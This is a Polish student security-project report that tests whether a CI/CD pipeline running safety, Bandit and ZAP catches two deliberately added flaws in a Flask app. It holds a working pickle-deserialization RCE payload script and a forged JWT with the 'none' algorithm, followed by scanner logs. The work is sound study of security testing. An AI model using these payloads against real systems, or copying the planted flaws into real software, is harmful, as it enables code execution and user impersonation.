# Projekt TBO (SW)

Projekt został zrealizowany przez zespół w składzie:

- Sygocki Dawid
- Walczak Jan

Repozytorium projektowe (czyli to repozytorium): https://gitlab.com/Dove6/tbo-23z-sw-projekt  
Rozwiązanie CI/CD: GitLab CI/CD  
Język aplikacji: Python  
Repozytorium źródłowe aplikacji: https://github.com/MohammadSatel/Flask_Book_Library (aplikacja z laboratorium)

Aplikacja została przystosowana do wykonania projektu w sposób następujący:

- dodano walidację danych zapisywanych w bazie ([źródło](https://github.com/Dove6/TBO-lab1)),
- dodano testy jednostkowe dla jednego z widoków ([źródło](https://github.com/Dove6/TBO-lab3)),
- dodano uproszczony[^uproszczony] mechanizm uwierzytelniania z użyciem żetonów JWT (biblioteka [Flask-JWT-Extended](https://flask-jwt-extended.readthedocs.io/en/stable/)):
  - endpoint (bez widoku) służący do rejestracji,
  - endpoint (bez widoku) służący do logowania się,
  - endpoint (bez widoku) wyświetlający nazwę użytkownika uwierzytelnionym klientom,
- dodano prostą definicję API w formacie OpenAPI (biblioteka [APIFlask](https://apiflask.com/)).

Obecne w aplikacji podatności nie zostały naprawione.

## Zadanie 1. Konfiguracja repozytorium oraz procesu CI/CD

Repozytorium zostało skonfigurowane zgodnie z instrukcją.

Uprawnienia ustawiono w sposób następujący:

- Merge requesty mogą być tworzone przez każdego, ale wykonywać (merge'ować) może je jedynie Maintainer (osoba zarządzająca repozytorium). [Punkt 1.2. instrukcji]
- Tylko użytkownicy będący członkami projektu mogą tworzyć nowe gałęzie bezpośrednio na repozytorium. Pozostali mogą forkować projekt, a następnie tworzyć na nim Merge Requesty. [Punkt 1.3. instrukcji]

Poniżej znajduje się opis kolejnych kroków [procesu CI/CD](./.gitlab-ci.yml):

1. Uruchamiane są testy jednostkowe (biblioteka `pytest`). Jeśli testy jednostkowe nie przejdą, pipeline kończy działanie. [Punkt 1.5. instrukcji]
2. Uruchamiane są testy bezpieczeństwa. Jeśli którykolwiek z nich się nie powiedzie, pipeline kończy działanie. [Punkt 1.5. instrukcji]
   - Testy SCA wykorzystują poznane na laboratorium narzędzie [safety](https://hub.docker.com/r/pyupio/safety) z bazą podatności [Safety DB](https://github.com/pyupio/safety-db).
   - Testy SAST opierają się o polecone w instrukcji narzędzie [Bandit](https://github.com/PyCQA/bandit).
   - Testy DAST przeprowadzane są z użyciem skanera [ZAP](https://www.zaproxy.org/) w trybie [API scan](https://www.zaproxy.org/docs/docker/api-scan/) ze względu na to, że niektóry endpointy nie mają odpowiadającego im widoku. Oznacza to jednak, że nie są wykonywane testy pod kątem podatności XSS[^xss]. Skan wykonywany jest na obrazie aplikacji zbudowanym w trybie testowym (bez wypychania do rejestru). Na start wykonywane jest logowanie na konto testowe, a uzyskany żeton JWT przekazywany jest do skanera ZAP tak, by testy były jak najbardziej kompletne.
3. Budowany jest obraz aplikacji. Obraz jest opatrywany tagiem `latest` (dla gałęzi `main`) lub `beta` (dla pozostałych), a następnie wypychany do rejestru obrazów [skojarzonego z repozytorium](https://gitlab.com/Dove6/tbo-23z-sw-projekt/container_registry/5989071). [Punkty 1.1., 1.4. instrukcji]

## Zadanie 2. Weryfikacja działania procesu CI/CD

Działanie procesu CI/CD zostało sprawdzone poprzez dodanie 2 nowych podatności bezpieczeństwa na gałęzi [`task2`](https://gitlab.com/Dove6/tbo-23z-sw-projekt/-/tree/task2).

### Opis dodanych podatności

<details><summary>1. RCE - pickle</summary>

**Motywacja:** Aby ułatwić migrację danych książek pomiędzy instancjami aplikacji, programiści dodali funkcję wczytywania i przetwarzania zserializowanej struktury danych opisującej książkę. Funkcja została upubliczniona dla wygody klienta. Jako format danych programiści wybrali pickle - ze względu na prostotę użycia i brak konieczności instalowania dodatkowych zależności.

**Podatność:** Przekazywanie danych za pomocą formatu pickle powinno odbywać się wyłącznie w zaufanym kontekście, ponieważ odpowiednio spreparowane pliki są w stanie wywołać dowolny kod Python w momencie deserializacji poprzez nadpisanie metody `__reduce__` dla przekazywanego obiektu[^sour_pickles]. Oznacza to wystąpienie podatność typu **Remote Code Execution**.

**Prezentacja wykorzystania podatności:**

Poniższy skrypt w języku Python tworzy plik `dangerous.pickle` (do pobrania [tu](./img/dangerous.pickle)), który w momencie deserializacji tworzy w katalogu aplikacji plik `hacked.txt` o zawartości `Hacked`, a następnie rzuca wyjątek celem przerwania dalszego przetwarzania żądania.

```py
import pickle

class DangerousObject:
    def __reduce__(self):
        return exec, ("import os; os.system('echo \"Hacked\" > hacked.txt'); raise Exception('Hacked')",)

if __name__ == "__main__":
    with open("dangerous.pickle", "wb") as pickle_file:
        pickle.dump(DangerousObject(), pickle_file)
```

Plik jest wgrywany na serwer poprzez stronę:

![Ekran tworzenia książki](./img/pickle_example_1.png)

![Okno dialogowe wyboru pliku](./img/pickle_example_2.png)

W rezultacie rzucany jest wyjątek:

![Odpowiedź z serwera](./img/pickle_example_3.png)

W katalogu aplikacji pojawia się plik:

![Utworzony plik](./img/pickle_example_4.png)

</details>

<details><summary>2. JWT none</summary>

**Motywacja:** Aby ułatwić testowanie aplikacji, programiści dodali obsługę algorytmu `none` do modułu weryfikującego żetony JWT. Zabrakło jednak sprawdzenia, czy aplikacja znajduje się rzeczywiście w środowisku testowym i finalnie obsługa algorytmu `none` trafiła do środowiska produkcyjnego.

**Podatność:** Poznana na laboratorium podatność związana z zastosowaniem w żetonie JWT algorytmu `none` polega na tym, że przy pominięciu podpisu walidacja takiego żetonu zakończy się pomyślnie. Oznacza to, że w treści żetonu można umieścić dowolne dane i zostana one przyjęte przez serwer bez zgłoszenia błędu.

**Prezentacja wykorzystania podatności:**

Serwer udostępnia wymagający uwierzytelnienia endpoint `/protected`, który wyświetla nazwę użytkownika:

![Endpoint `/protected` bez uwierzytelnienia](./img/jwt_example_1.png)

W wyniku logowania generowany jest poprawny żeton JWT:

![Wynik logowania](./img/jwt_example_2.png)

Po użyciu uzyskanego w ten sposób żetonu endpoint `/protected` wyświetla nazwę użytkownika `test2`.

![Endpoint `/protected` po zalogowaniu](./img/jwt_example_3.png)

Przykładowy poprawny żeton ma strukturę:

```json
{
  "alg": "HS256",
  "typ": "JWT"
}
.
{
  "fresh": false,
  "iat": 1705921613,
  "jti": "db3aabf1-9f25-4611-a9ff-3a774588cde1",
  "type": "access",
  "sub": "test2",
  "nbf": 1705921613,
  "csrf": "11ae9f3f-c9b1-4eeb-8bbd-9de8f80cce8f",
  "exp": 1705922513
}
.
' \x14wIg\xce\xec\xf1\x95\xf7\x9fj4\x00\x05?\xb5\xcc\x91\xca}\x15\x84b\x9a\xc51\x82\xbfH'
```

Po zmianie algorytmu na `none`, nazwy użytkownika na `podstawiona nazwa użytkownika` i usunięciu podpisu żeton wygląda następująco:

```json
{
  "alg": "none",
  "typ": "JWT"
}
.
{
  "fresh": false,
  "iat": 1705921613,
  "jti": "db3aabf1-9f25-4611-a9ff-3a774588cde1",
  "type": "access",
  "sub": "podstawiona nazwa użytkownika",
  "nbf": 1705921613,
  "csrf": "11ae9f3f-c9b1-4eeb-8bbd-9de8f80cce8f",
  "exp": 1705922513
}
.
```

Spreparowany w taki sposób żeton jest pomyślnie przyjmowany przez aplikację:

![Endpoint `/protected` z podstawionym żetonem](./img/jwt_example_4.png)

</details>

### Wyniki

Poniżej znajduje się porównanie logów z narzędzi przed i po wprowadzeniu podatności.

<details><summary>Testy SCA</summary>

W wynikach testów SCA nie zaszły żadne zmiany. W ramach dodawania podatności nie były potrzebne żadne dodatkowe zależności:

- moduł `pickle` wykorzystywany w podatności RCE jest modułem wbudowanym w język Python,
- dodanie algorytmu `none` do warstwy uwierzytelniającej korzystało z zależności już używanych w projekcie.

</details>

<details><summary>Testy SAST</summary>

Narzędzie Bandit wykryło po wprowadzeniu zależności:

- import modułu `pickle` (niska ważność, wysoka pewność),
- wywołanie metody deserializacji `pickle.loads` (umiarkowana ważność, wysoka pewność).

```diff
@@ -24,19 +24,37 @@ Test results:
 53	                test_user.password = 'test'
 54	            db.session.commit()
 --------------------------------------------------
+>> Issue: [B403:blacklist] Consider possible security implications associated with pickle module.
+   Severity: Low   Confidence: High
+   CWE: CWE-502 (https://cwe.mitre.org/data/definitions/502.html)
+   More Info: https://bandit.readthedocs.io/en/1.7.6/blacklists/blacklist_imports.html#b403-import-pickle
+   Location: ./project/books/views.py:5:0
+4	from project.books.models import Book, CreateBookSchema, EditBookSchema, CreatePickledBookSchema
+5	import pickle
+6	
+--------------------------------------------------
+>> Issue: [B301:blacklist] Pickle and modules that wrap it can be unsafe when used to deserialize untrusted data, possible security issue.
+   Severity: Medium   Confidence: High
+   CWE: CWE-502 (https://cwe.mitre.org/data/definitions/502.html)
+   More Info: https://bandit.readthedocs.io/en/1.7.6/blacklists/blacklist_calls.html#b301-pickle
+   Location: ./project/books/views.py:54:11
+53	    data = files_data
+54	    data = pickle.loads(data['file'].read())
+55	    new_book = Book(name=data['name'], author=data['author'], year_published=data['year_published'], book_type=data['book_type'])
+--------------------------------------------------
 Code scanned:
-	Total lines of code: 702
+	Total lines of code: 732
 	Total lines skipped (#nosec): 0
 	Total potential issues skipped due to specifically being disabled (e.g., #nosec BXXX): 0
 Run metrics:
 	Total issues (by severity):
 		Undefined: 0
-		Low: 2
-		Medium: 0
+		Low: 3
+		Medium: 1
 		High: 0
 	Total issues (by confidence):
 		Undefined: 0
 		Low: 0
 		Medium: 2
-		High: 0
+		High: 2
 Files skipped (0):
```

</details>

<details><summary> Testy DAST </summary>

Skaner `zap-api-scan` wykrył jedynie zwiększenie liczby endpointów. W związku z tym pojawiły się nowe ostrzeżenia dotyczące występujących w nich nieumyślnie wprowadzonych[^nieumyślnie] podatności typu: ujawnienie wiadomości błędu, brak żetonów CSRF, niepoprawne zachowanie nagłówków HTTP.

Jednocześnie zauważyć można, że część ostrzeżeń zniknęła. Ponieważ zjawisko dotyczy również komponentów, które nie były modyfikowane w ramach dodawania podatności (`/loans`, `/customers`), może to oznaczać losowość działania narzędzi - ograniczenie czasowe albo liczbowe skanowanych endpointów i podatności.

```diff
@@ -1,6 +1,6 @@
 $ docker run --rm --network host -e ZAP_AUTH_HEADER_VALUE="Bearer $AUTH_TOKEN" ghcr.io/zaproxy/zaproxy:stable zap-api-scan.py -t "http://localhost:5000/openapi.json" -f openapi
-2024-01-21 22:35:12,303 Number of Imported URLs: 39
-Total of 224 URLs
+2024-01-22 13:02:24,999 Number of Imported URLs: 40
+Total of 228 URLs
 PASS: Directory Browsing [0]
 PASS: Vulnerable JS Library (Powered by Retire.js) [10003]
 PASS: In Page Banner Information Leak [10009]
@@ -100,18 +100,18 @@ PASS: Loosely Scoped Cookie [90033]
 PASS: Cloud Metadata Potentially Exposed [90034]
 PASS: Server Side Template Injection [90035]
 PASS: Server Side Template Injection (Blind) [90036]
-WARN-NEW: A Server Error response code was returned by the server [100000] x 5 
+WARN-NEW: A Server Error response code was returned by the server [100000] x 6 
+	http://localhost:5000/books/create-pickled (500 INTERNAL SERVER ERROR)
 	http://localhost:5000/customers/create (500 INTERNAL SERVER ERROR)
 	http://localhost:5000/register (500 INTERNAL SERVER ERROR)
 	http://localhost:5000/books/create (500 INTERNAL SERVER ERROR)
 	http://localhost:5000/loans/create (500 INTERNAL SERVER ERROR)
-	http://localhost:5000/books/10/edit (500 INTERNAL SERVER ERROR)
-WARN-NEW: Unexpected Content-Type was returned [100001] x 17 
+WARN-NEW: Unexpected Content-Type was returned [100001] x 18 
 	http://localhost:5000/ (200 OK)
 	http://localhost:5000/books/ (200 OK)
 	http://localhost:5000/books/create (302 FOUND)
+	http://localhost:5000/books/create-pickled (500 INTERNAL SERVER ERROR)
 	http://localhost:5000/customers/ (200 OK)
-	http://localhost:5000/customers/create (500 INTERNAL SERVER ERROR)
 WARN-NEW: Cross-Domain JavaScript Source File Inclusion [10017] x 8 
 	http://localhost:5000/ (200 OK)
 	http://localhost:5000/ (200 OK)
@@ -136,26 +136,26 @@ WARN-NEW: Server Leaks Version Information via "Server" HTTP Response Header Fie
 	http://localhost:5000/openapi.json (200 OK)
 	http://localhost:5000/books/ (200 OK)
 	http://localhost:5000/books/create (302 FOUND)
-	http://localhost:5000/books/details/book_name (404 NOT FOUND)
-WARN-NEW: Content Security Policy (CSP) Header Not Set [10038] x 5 
+	http://localhost:5000/books/create-pickled (500 INTERNAL SERVER ERROR)
+WARN-NEW: Content Security Policy (CSP) Header Not Set [10038] x 6 
 	http://localhost:5000/ (200 OK)
 	http://localhost:5000/books/ (200 OK)
+	http://localhost:5000/books/create-pickled (500 INTERNAL SERVER ERROR)
 	http://localhost:5000/customers/create (500 INTERNAL SERVER ERROR)
 	http://localhost:5000/customers/ (200 OK)
-	http://localhost:5000/loans/ (200 OK)
 WARN-NEW: Cookie without SameSite Attribute [10054] x 1 
 	http://localhost:5000/loans/ (200 OK)
-WARN-NEW: Permissions Policy Header Not Set [10063] x 5 
+WARN-NEW: Permissions Policy Header Not Set [10063] x 6 
 	http://localhost:5000/ (200 OK)
 	http://localhost:5000/books/ (200 OK)
+	http://localhost:5000/books/create-pickled (500 INTERNAL SERVER ERROR)
 	http://localhost:5000/customers/ (200 OK)
 	http://localhost:5000/customers/create (500 INTERNAL SERVER ERROR)
-	http://localhost:5000/loans/ (200 OK)
-WARN-NEW: Absence of Anti-CSRF Tokens [10202] x 5 
+WARN-NEW: Absence of Anti-CSRF Tokens [10202] x 7 
 	http://localhost:5000/books/ (200 OK)
 	http://localhost:5000/books/ (200 OK)
-	http://localhost:5000/customers/ (200 OK)
-	http://localhost:5000/customers/ (200 OK)
+	http://localhost:5000/books/ (200 OK)
+	http://localhost:5000/books/create-pickled (500 INTERNAL SERVER ERROR)
 	http://localhost:5000/customers/create (500 INTERNAL SERVER ERROR)
 WARN-NEW: Buffer Overflow [30001] x 3 
 	http://localhost:5000/books/create (500 INTERNAL SERVER ERROR)
@@ -167,8 +167,9 @@ WARN-NEW: Sub Resource Integrity Attribute Missing [90003] x 12
 	http://localhost:5000/ (200 OK)
 	http://localhost:5000/ (200 OK)
 	http://localhost:5000/ (200 OK)
-WARN-NEW: Application Error Disclosure [90022] x 3 
+WARN-NEW: Application Error Disclosure [90022] x 4 
 	http://localhost:5000/openapi.json (200 OK)
+	http://localhost:5000/books/create-pickled (500 INTERNAL SERVER ERROR)
 	http://localhost:5000/customers/create (500 INTERNAL SERVER ERROR)
 	http://localhost:5000/register (500 INTERNAL SERVER ERROR)
 FAIL-NEW: 0	FAIL-INPROG: 0	WARN-NEW: 14	WARN-INPROG: 0	INFO: 0	IGNORE: 0	PASS: 99
```

</details>

Podsumowując otrzymane wyniki, spośród dwóch wprowadzonych podatności została wykryta tylko jedna, w dodatku częściowo. Mowa tutaj o podatności RCE z użyciem modułu `pickle`. Wprawdzie skaner Bandit wygenerował ostrzeżenie dotyczące użycia modułu `pickle`, ale nie wspomniał o możliwości uruchomieniu arbitralnego kodu, ważność podatności oznaczając jako zaledwie umiarkowaną.

Podatność związana z uwierzytelnianiem żetonami JWT z wykorzystaniem algorytmu `none` pozostała niewykryta. Narzędzie do analizy statycznej można usprawiedliwić - kod aktywujący podatność był raczej nietypowy ze względu na to, że domyślnie biblioteka odpowiadająca za weryfikację JWT odrzucała wszystkie żetony wykorzystujące algorytm `none`. Można się było jednak spodziewać, że podatność wykryta zostanie przez skaner dynamiczny. Niestety, mimo zawarcia w specyfikacji OpenAPI szczegółowych informacji o sposobie uwierzytelnienia oraz dostarczenia skanerowi przykładowego nagłówka HTTP Authorization, luka w zabezpieczeniach nie została wykryta. Możliwe, że sprawdzanie podatności JWT nie było elementem podstawowej listy sprawdzeń wykonywanych przez skaner, lecz wymagało dołączenia [specjalnego dodatku](https://www.zaproxy.org/blog/2020-09-03-zap-jwt-scanner/).

---

[^uproszczony]: Mechanizm nie spełnia podstawowych wymogów bezpieczeństwa, np. hasła są zapisywane w bazie danych w formie dosłownej (tekst bez szyfrowania), brak wymogów odnośnie złożoności.
[^xss]: Podatności XSS nie zostały wprowadzone w ramach zadania 2, więc testowanie aplikacji pod ich kątem nie było potrzebne.
[^sour_pickles]: M. Slaviero, "Sour Pickles. Shellcoding in Python’s serialisation format". Dostęp online (22.01.2024): https://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_WP.pdf
[^nieumyślnie]: Opisane podatności powodowane są niską jakością aplikacji Flask_Book_Library, której poprawa nie była celem projektu.
